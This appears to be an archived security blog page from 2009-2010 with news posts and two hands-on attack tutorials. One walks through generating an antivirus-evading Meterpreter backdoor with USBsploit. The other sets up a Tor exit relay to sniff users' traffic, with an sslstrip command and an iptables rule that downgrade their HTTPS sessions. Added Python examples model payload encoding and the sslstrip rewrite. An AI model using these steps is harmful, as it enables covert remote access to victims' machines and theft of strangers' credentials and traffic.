Archive for category hacking
Spreading Ghosts Attacks
Posted by Mourad Ben Lakhoua in Anti-Viruses, Vulnerabilities & attacks, hacking on July 23, 2010
Leonardo da Vinci is widely considered one of the greatest painters of all time, and perhaps the most diversely talented person ever to have lived. Leonardo said that there are three types of people one may encounter: “Those who see. Those who see when they are shown. Those who do not see.”
Here I want to add a class of people who see even when they are prevented from seeing: the hacker class.
One of the first things an attacker does after compromising a remote system is to plant a backdoor. I am referring to a ghost: a piece of software that, once run, gives the attacker remote access to the system and lets them collect all activity on the targeted machine.
USBsploit is a tool, still in beta, created by an infosec researcher who owns the popular portal Secubs. It makes it simple for anyone to generate such a backdoor in a few steps.
First, choose a suitable distribution: BackTrack, Debian or Ubuntu, with Metasploit's dependencies installed. Then follow the clear, step-by-step instructions on the official website.
When you run USBsploit you get a menu listing the actions you can perform:
1. Create a Backdoor
2. Create a Backdoor and launch a Listener only for the USB Dump attack
3. Launch a Listener for the USB Dump attack from the last Dump configuration file
4. Update the USBsploit Framework
5. Edit the last Dump configuration file (needs vi)
6. Edit the global options (needs vi)
7. Edit the file extensions set to dump (needs vi)
If you choose to create a backdoor you will be asked for the IP address of the listener; by default the tool detects the local machine's IP.
Next you select the kind of backdoor to deploy, depending on the victim's operating system:
1. Windows Meterpreter Reverse_TCP Spawn a shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64)
3. Windows Meterpreter Egress Buster Spawn a shell and find a port home via multiple ports
The next step is an important one: you choose the encoding applied to the payload in an attempt to bypass weak antivirus products.
Select one of the options below; Backdoored Executable is typically the best choice.
1. shikata_ga_nai (Very Good)
2. Multi-Encoder (Excellent)
3. Backdoored Executable (BEST)
After encoding, the executable is written to “/opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe”.
The tool thus produces, in a few steps, a backdoor that many popular antivirus products fail to detect.
My experience was interesting: when I tested the generated executable, which had been encoded by msfencode, only 10 of 42 antivirus engines detected it as a Trojan.
Start the listener, then run the .exe on a Windows machine. In the test described above it ran even on a host protected by one of the antivirus products that failed to detect the malicious code with the latest definitions, such as Kaspersky.
The Meterpreter session then gives you access to all activity on the target machine and total visibility of the whole system.
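The encoder step above is what defeats a scanner that looks for fixed byte patterns. The following is an added example (not USBsploit or Metasploit code) that models the idea behind x86/shikata_ga_nai in a simplified form: each 32-bit word is XORed with a running key, and the decoded word is then added to the key, so every later word depends on the ones before it. It shows that a fixed signature present in the raw payload is not present in the encoded copy, that stacking several passes with different keys (the “Multi-Encoder” option, msfencode -i N) behaves the same way, and that a decoder needs only the initial key. The payload is constructed text, not shellcode, and no decoder stub or executable is produced.

```python
"""Additive-feedback XOR encoding, illustrating why a fixed byte signature that
matches a raw payload does not match the encoded copy, while the decoder still
recovers the original.  Added example, not USBsploit or Metasploit code: the
scheme mirrors the idea behind x86/shikata_ga_nai (XOR each 32-bit word with a
running key, then add the decoded word to the key) but is not that encoder, and
it emits no decoder stub or executable.  The payload below is constructed text,
not shellcode.
"""
import struct
from typing import Dict, Iterable

WORD = 4            # encode in 32-bit little-endian words
MASK = 0xFFFFFFFF


def _pad(data: bytes) -> bytes:
    """Pad with 0x90 (x86 NOP) so the length is a multiple of the word size."""
    return data + b"\x90" * (-len(data) % WORD)


def encode(payload: bytes, key: int) -> bytes:
    """XOR each word with the key; the key then absorbs the plaintext word."""
    out = bytearray()
    k = key & MASK
    for (word,) in struct.iter_unpack("<I", _pad(payload)):
        out += struct.pack("<I", word ^ k)
        k = (k + word) & MASK        # feedback: later words depend on earlier ones
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """Inverse of encode(): only the initial key is needed, as in a decoder stub."""
    out = bytearray()
    k = key & MASK
    for (enc,) in struct.iter_unpack("<I", blob):
        word = enc ^ k
        out += struct.pack("<I", word)
        k = (k + word) & MASK
    return bytes(out)


def encode_layers(payload: bytes, keys: Iterable[int]) -> bytes:
    """Stack several passes with different keys (cf. msfencode -i N / Multi-Encoder)."""
    blob = payload
    for key in keys:
        blob = encode(blob, key)
    return blob


def decode_layers(blob: bytes, keys: Iterable[int]) -> bytes:
    """Undo encode_layers(): the passes are reversed in the opposite order."""
    for key in reversed(list(keys)):
        blob = decode(blob, key)
    return blob


def signature_hits(sample: bytes, signature: bytes) -> bool:
    """Toy signature scan: does the fixed byte pattern occur anywhere in the sample?"""
    return signature in sample


# Constructed stand-in for a payload (plain text, not shellcode).
PAYLOAD = b"CONSTRUCTED SAMPLE PAYLOAD, NOT SHELLCODE: connect back to 10.0.0.5 port 4444"
SIGNATURE = b"connect back"    # the kind of fixed pattern a weak scanner keys on
STACK_KEYS = [0x1234ABCD, 0xDEADBEEF, 0x0BADF00D]


def demo(key: int = 0x1234ABCD) -> Dict[str, bool]:
    """Run the signature check against raw, single-pass and stacked encodings."""
    single = encode(PAYLOAD, key)
    stacked = encode_layers(PAYLOAD, STACK_KEYS)
    return {
        "raw_detected": signature_hits(PAYLOAD, SIGNATURE),                 # True
        "encoded_detected": signature_hits(single, SIGNATURE),              # False
        "stacked_detected": signature_hits(stacked, SIGNATURE),             # False
        "roundtrip_ok": decode(single, key).rstrip(b"\x90") == PAYLOAD,     # True
        "stacked_roundtrip_ok":
            decode_layers(stacked, STACK_KEYS).rstrip(b"\x90") == PAYLOAD,  # True
        "keys_change_output": single != encode(PAYLOAD, key + 1),           # True
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point for defenders is the inverse of the point for attackers: the encoded bytes carry no stable pattern, so detection has to look at behaviour (the decoder loop itself, the network connection the payload opens) rather than at the payload's bytes.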
make sure you subscribe to my RSS feed!
Black Hat USA 2010
Posted by Mourad Ben Lakhoua in Security events, hacking on July 11, 2010
At the end of this month, Black Hat USA 2010 takes place in Las Vegas, where new vulnerabilities, tools and programs will be presented.
Black Hat is one of the biggest and most important hacking events in the world, attracting thousands of experts. This year Black Hat celebrates its 13th anniversary. Among the sessions is a cyber-war discussion by General Michael V. Hayden, former director of the National Security Agency and the Central Intelligence Agency.
About 30 new vulnerabilities and 46 tools will be shown, and 25 independent researchers will demonstrate the latest cutting-edge technology.
Well-known speakers contributing to the event include:
• “Cyber war…Are we at war? And if we are, how should we fight it?” presented by General Michael V. Hayden, former Director, National Security Agency and Central Intelligence Agency
• “Jackpotting Automated Teller Machines Redux” by Barnaby Jack
• “Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios” by Shawn Moyer and Nathan Keltner
• “How to Hack Millions of Routers” by Craig Heffner
• “These Aren’t the Permissions You’re Looking For” by Anthony Lineberry
• “App Attack: Surviving the Mobile Application Explosion” by John Hering and Kevin Mahaffey
• “Hacking and Protecting Oracle Database Vault” by Esteban Martinez Fayo
• “Token Kidnapping’s Revenge” by Cesar Cerrudo
• “HTTPS Can Byte Me” by Josh Sokol and Robert Hansen
• “USB – HID, The Hacking Interface Design” by Richard Rushing.
For more information, visit the official website.
Sniffing/MITM Attacks on Tor network
Posted by Mourad Ben Lakhoua in Internet, hacking on January 1, 2010
Tor is a wonderful tool for protecting your privacy on the Internet. It is software you run on your computer to help keep you safe online: it prevents somebody watching your Internet connection from learning which sites you visit, and it prevents the sites you visit from learning your physical location. But if you think that is Tor's only role, you are wrong; it is just one of its main purposes. Another is to run a relay and make it available for other users' traffic to pass through.
By running a sniffer on that relay you can see all unencrypted traffic passing through it, and gather data and sensitive information from it.
To start, get a Linux distribution such as BackTrack or Ubuntu, free and available online, running in a virtual machine. Next, download the latest Tor version (currently 0.2.1.20). After installing the packages it is better to create a dedicated user for the relay, here toruser: uid=111(toruser) gid=10(wheel) groups=0(wheel),10(wheel). Tor keeps its configuration in the .tor directory under that user's home (/home/toruser/.tor/torrc), so open that file in a text editor.
In the settings we customize the following:
ControlPort – the port used for remote management of the Tor server. Most relays use 9051.
DirPort – advertise the directory service on this port. The value is 9030.
ControlPort 9051
DirPort 9030
ExitPolicy – determines which traffic we will accept and forward as an exit. Entries are evaluated in order and the first one that matches decides. By default the policy is as follows:
reject *:25, reject *:119, reject *:135-139, reject *:445, reject *:563, reject *:1214,
reject *:4661-4666, reject *:6346-6429, reject *:6699, reject *:6881-6999, accept *:*
Here we choose the services we want to receive on our node and forward (HTTP, HTTPS, POP3, IMAP, IMAPS, POP3S), so the policy becomes:
ExitPolicy accept *:80, accept *:443, accept *:110, accept *:143, accept *:993, accept *:995, reject *:*
HashedControlPassword – the hashed password for remote configuration of the Tor server, so that a malicious user cannot take control of it (generate the value with tor --hash-password).
Nickname – the server name.
ORPort – the port used to connect with other nodes, 9001.
SocksListenAddress – localhost (127.0.0.1).
Save the changes and close the file. The server is now ready to launch:
$ tor -f /home/toruser/.tor/torrc
It takes roughly 20 minutes for the relay to test its reachability and ports. Then you can go to http://moria.seul.org:9032/tor/status/authority and find your server among the other server names.
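Because an ExitPolicy is applied top to bottom with the first match winning, the order of the entries is what decides whether the node is a narrow exit or not an exit at all. The following added example (not Tor's own code) evaluates a policy the way the relay does, with Tor's built-in default appended after your own entries as Tor does. It goes slightly beyond the post's own policy by also accepting IPv4 addresses and CIDR ranges in place of `*`; it ignores Tor's implicit rejection of private address ranges. The destination addresses are constructed TEST-NET values.

```python
"""Evaluate a Tor ExitPolicy the way the relay applies it: entries are checked
in order and the first one that matches the destination decides.  Added
example, not Tor's own code; it handles accept/reject, '*' or an IPv4
address/CIDR, and a port, port range or '*', and ignores Tor's implicit
rejection of private address ranges.
"""
import ipaddress
from typing import Dict, List, NamedTuple, Optional


class Rule(NamedTuple):
    accept: bool
    net: Optional[ipaddress.IPv4Network]   # None means any address ('*')
    lo: int
    hi: int


# Tor's built-in default (as listed in the post); Tor appends it after your own
# policy, so traffic your entries do not mention falls through to it.
DEFAULT_POLICY = ("reject *:25, reject *:119, reject *:135-139, reject *:445, "
                  "reject *:563, reject *:1214, reject *:4661-4666, "
                  "reject *:6346-6429, reject *:6699, reject *:6881-6999, accept *:*")


def parse_policy(policy: str) -> List[Rule]:
    """Parse 'accept *:80, reject 10.0.0.0/8:*, ...' into an ordered rule list."""
    rules: List[Rule] = []
    for entry in policy.split(","):
        entry = entry.strip()
        if not entry:
            continue
        action, _, target = entry.partition(" ")
        if action not in ("accept", "reject"):
            raise ValueError(f"bad action in {entry!r}")
        target = target.replace(" ", "")            # tolerate 'accept *: 80'
        addr, _, port = target.rpartition(":")
        net = None if addr == "*" else ipaddress.ip_network(addr, strict=False)
        if port == "*":
            lo, hi = 1, 65535
        elif "-" in port:
            lo, hi = (int(p) for p in port.split("-", 1))
        else:
            lo = hi = int(port)
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"bad port spec in {entry!r}")
        rules.append(Rule(action == "accept", net, lo, hi))
    return rules


def exit_allows(rules: List[Rule], dest_ip: str, port: int) -> bool:
    """First matching rule wins; unmatched traffic falls through to the default."""
    ip = ipaddress.ip_address(dest_ip)
    for rule in rules + parse_policy(DEFAULT_POLICY):
        if (rule.net is None or ip in rule.net) and rule.lo <= port <= rule.hi:
            return rule.accept
    return True   # not reached: DEFAULT_POLICY ends with 'accept *:*'


# The policy from the post, and a misordered variant where the catch-all
# comes first, so the later accept is never consulted.
POST_POLICY = ("accept *:80, accept *:443, accept *:110, accept *:143, "
               "accept *:993, accept *:995, reject *:*")
MISORDERED_POLICY = "reject *:*, accept *:80"


def demo() -> Dict[str, bool]:
    """Check a few destinations against the post's, the default and a misordered policy."""
    post = parse_policy(POST_POLICY)
    default = parse_policy("")                  # empty: only Tor's default applies
    wrong = parse_policy(MISORDERED_POLICY)
    nets = parse_policy("reject 10.0.0.0/8:*, accept *:*")
    dst = "203.0.113.10"                        # constructed TEST-NET destination
    return {
        "post_http": exit_allows(post, dst, 80),            # True
        "post_ssh": exit_allows(post, dst, 22),             # False
        "default_ssh": exit_allows(default, dst, 22),       # True
        "default_smtp": exit_allows(default, dst, 25),      # False
        "default_netbios": exit_allows(default, dst, 137),  # False
        "misordered_http": exit_allows(wrong, dst, 80),     # False
        "cidr_private": exit_allows(nets, "10.1.2.3", 80),  # False
        "cidr_public": exit_allows(nets, dst, 80),          # True
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The misordered case is the one to check before starting the relay: with `reject *:*` first, the node advertises itself as a non-exit and the sniffing setup below sees no client traffic at all.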
Excellent, our server is working, so it is time to choose a sniffer. Wireshark already ships with BackTrack 4: select the interface and start capturing packets. Wireshark shows you all unencrypted traffic, such as website browsing and other HTTP navigation, in the clear. Not bad so far.
Now, what about the encrypted traffic? This is where SSLStrip comes in: go to Moxie Marlinspike's official website and download the latest version (an update was released two days ago).
Run the command:
$ python sslstrip.py -a -l 8080 -w today.log
HTTPS traffic is encrypted end to end between the client and the site, so even as the exit node we cannot read it directly. sslstrip instead sits on the plain-HTTP path and rewrites the redirects and links that would have taken the client to HTTPS, so the client keeps talking plain HTTP to us while sslstrip talks HTTPS to the site. To pass the exit's outgoing HTTP traffic through sslstrip, add this iptables rule:
$ sudo iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080
This makes all outgoing HTTP traffic from user toruser (uid 111) pass through sslstrip automatically. Now we just wait until some logs have been collected and check the log file. Note that a connection the client opens directly over HTTPS never passes through sslstrip; only sessions that start over plain HTTP can be downgraded.
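To make the downgrade concrete, here is an added example (not sslstrip's code) that models what the tool does to a plain-HTTP response on its way back to the client: https:// redirects and links are rewritten to http://, the Secure attribute is removed from cookies so the browser will also send them in the clear, and the downgraded URLs are remembered so that the client's later http:// requests for them are fetched over HTTPS upstream. The server response is constructed; bank.example is a placeholder host. The same model shows the limit noted above: a request the client makes over HTTPS from the start never reaches this code.

```python
"""A minimal model of what sslstrip does to a plain-HTTP response passing
through the exit: rewrite https:// redirects and links to http://, drop the
'Secure' attribute from cookies, and remember which URLs were downgraded so
that the client's later http:// requests for them are fetched over HTTPS
upstream.  Added illustration, not sslstrip's code; the response below is
constructed and bank.example is a placeholder host.
"""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

Header = Tuple[str, str]
_HTTPS_URL = re.compile(rb"https://([^\s\"'<>]+)")
_SECURE_FLAG = re.compile(r";\s*secure\b", re.IGNORECASE)


class Stripper:
    def __init__(self) -> None:
        # (host, path) pairs the victim now believes are plain http:// but
        # which the proxy must still fetch with https://
        self.downgraded: Set[Tuple[str, str]] = set()

    def _downgrade(self, m: "re.Match[bytes]") -> bytes:
        parts = urlsplit(m.group(0).decode("latin-1"))
        self.downgraded.add((parts.netloc, parts.path or "/"))
        return b"http://" + m.group(1)

    def rewrite(self, headers: List[Header], body: bytes) -> Tuple[List[Header], bytes]:
        """Return the response as the victim's browser will see it."""
        out: List[Header] = []
        for name, value in headers:
            lname = name.lower()
            if lname == "location":
                value = _HTTPS_URL.sub(self._downgrade, value.encode("latin-1")).decode("latin-1")
            elif lname == "set-cookie":
                value = _SECURE_FLAG.sub("", value)   # cookie now also sent over plain HTTP
            out.append((name, value))
        return out, _HTTPS_URL.sub(self._downgrade, body)

    def upstream_scheme(self, host: str, path: str) -> str:
        """Scheme the proxy uses toward the real site for a later client request."""
        return "https" if (host, path) in self.downgraded else "http"


# Constructed server response to a plain-HTTP request, as seen at the exit.
SAMPLE_HEADERS: List[Header] = [
    ("Location", "https://bank.example/login"),
    ("Set-Cookie", "sid=abc123; Secure; HttpOnly"),
]
SAMPLE_BODY = (b'<a href="https://bank.example/account">Account</a> '
               b'<a href="http://bank.example/help">Help</a>')


def demo() -> Dict[str, object]:
    """Rewrite the sample response and report what the client and proxy now see."""
    s = Stripper()
    headers, body = s.rewrite(SAMPLE_HEADERS, SAMPLE_BODY)
    return {
        "location": dict(headers)["Location"],                              # 'http://bank.example/login'
        "cookie": dict(headers)["Set-Cookie"],                              # 'sid=abc123; HttpOnly'
        "body": body,
        "account_upstream": s.upstream_scheme("bank.example", "/account"),  # 'https'
        "help_upstream": s.upstream_scheme("bank.example", "/help"),        # 'http'
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The defence is on the client side: a browser that already insists on HTTPS for the host (a bookmark, a typed https:// URL, or a cached HSTS policy) never sends the plain-HTTP request that this rewrite depends on.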
In the next post we will explain how to perform scanning for black-box penetration testing through a Tor proxy.
It is important to note that all programs are used for educational purposes only.
Twitter Was Owned.. No it was a Compromised DNS trick!
Posted by Mourad Ben Lakhoua in Internet, News, hacking on December 18, 2009
This morning the Twitter website was out of service for two hours, and the cause was a DNS attack. Many users thought the site had been compromised by hackers from the “Iranian Cyber Army” exploiting WordPress vulnerabilities, but that was not the case: the attack targeted Twitter's DNS records, redirecting users trying to reach the Twitter website to the attackers' IP address.
The Twitter team posted the following on their blog:
As we tweeted a bit ago, Twitter’s DNS records were temporarily compromised tonight but have now been fixed. As some noticed, Twitter.com was redirected for a while but API and platform applications were working. We will update with more information and details once we’ve investigated more fully.
This is not the first DNS attack in the news; there have been a large number of incidents involving DNS records, and it is now very important to start deploying DNSSEC to protect DNS data. Note, though, that DNSSEC authenticates the records an authoritative zone publishes; it does not help when the published records themselves are changed by someone who has taken over the zone's DNS account.
US CERT Warns of PhoneSnoop Attack Against BlackBerry
Posted by Mourad Ben Lakhoua in Tools, Vulnerabilities & attacks, hacking on October 28, 2009
US-CERT issued a new warning about a free application that lets an attacker spy on phone conversations. The program has to be installed on the victim's device; once installed, the attacker can listen to all of the victim's calls.
The application is called PhoneSnoop, and although it provides functionality similar to FlexiSPY, it is the first free program of its kind. Chirashi Zensay, the creator of the tool, posted on his blog: “PhoneSnoop demonstrates how a BlackBerry can be used to spy on its owner. While the BlackBerry remains one of the more secure devices out there, user awareness and education is paramount to remaining completely safe from spyware. I tweaked the application since my first post, now allowing anyone to download, install and try it. PhoneSnoop now has the ability for a user to customize the ‘trigger number’, rather than me having to give out customized versions.”
The program was released to demonstrate how easily BlackBerry devices can be abused by software installed on them, and there is currently an effort to release new software that can route SMS messages through an attacker.
US-CERT encourages users to download BlackBerry applications only from trusted sources and to password-protect and lock their BlackBerry devices.
4shared.com Owned!
Posted by Mourad Ben Lakhoua in News, hacking on September 14, 2009
Yesterday it was reported that 4shared.com had been compromised by members of the Anti-sec group. At first many people did not believe that the popular file-sharing portal had been hacked, until official sources confirmed the incident.
The attack took place at the end of last week, and all users who tried to visit or check their files on http://www.4shared.com got a different page reading “I love Morocco”. So far there are no details about the attack (whether it was DNS poisoning, a PHP include vulnerability, or something else) or about what vulnerability was exploited.
This incident casts serious doubt on the security level of the 4shared.com portal, even though many users confirmed that their files seem to be intact. Any information stored anywhere can be extracted by attackers, and nothing prevents us from encrypting our stored data in whatever form we choose; what matters is being able to decrypt those files afterwards.
The site is now working and open for uploads, but do not leave your data unprotected.
SecurityTubeCon: first online Hacker Conference
Posted by Mourad Ben Lakhoua in Webcasts, hacking on September 11, 2009
SecurityTubeCon is the first online hacker conference. It will be held on 6, 7 and 8 November and aims to give researchers a way to share and exchange ideas online regardless of their physical location.
The speaker selection procedure is unusual: the organizers do not intend to approve or reject participants, so everyone is heard. Talk abstracts are put online and attendees choose the presentations they want to join. For those unable to attend a presentation live, all videos will be freely available for download a week after the conference.
The conference main topics will include:
a. Research Track: Show your bleeding edge research and zero days.
b. Tutorials Track: In-depth Tutorials on security technologies can be given by domain experts
c. Tool Demos: Demonstration of new and cutting edge tools by their original authors
d. Security Product Demos: Demos of state of the art security products by companies and organizations
More information can be found here; interested speakers are requested to submit their talk abstracts before the deadline.
Astalavista.com Owned!
Posted by Mourad Ben Lakhoua in News, hacking on June 6, 2009
The Astalavista website was hacked by a group calling itself anti-sec.
Astalavista was a hacking and security community that started in 1994 and was one of the first search engines for exploits and computer security information. It provided a board for the hacking and security community to share the latest techniques for software cracking, spyware editing and viruses.
According to the anti-sec group, they targeted http://astalavista.com because, in their words, Astalavista is “not doing any of this for the ‘community’ but for the money”: they spread exploits for kids, claim to be a security community (with no real sense of security on their own servers), and charge $6.66 per month for access to a dead forum with a directory full of public releases and outdated or broken services. “We wanted to see how good that ‘team of security and IT professionals’ really is.”
They also published the shell commands they used to get into the web server, which you can find on the Zone-H website.
HACKING AT RANDOM 2009
Posted by Mourad Ben Lakhoua in News, hacking on April 10, 2009

Preparations are going well for this year's European outdoor hacker festival, Hacking At Random, which takes place in the Netherlands on August 13-16, 2009. The special discounted rate for people buying tickets early has been extended to April 14.
The Dutch hacker camps take place every four years. The last one (What The Hack) was held in 2005 and was a great experience overall. Those of you who vowed not to miss the next one should be especially careful not to miss this one.
To subscribe and receive the latest news, visit the official website.

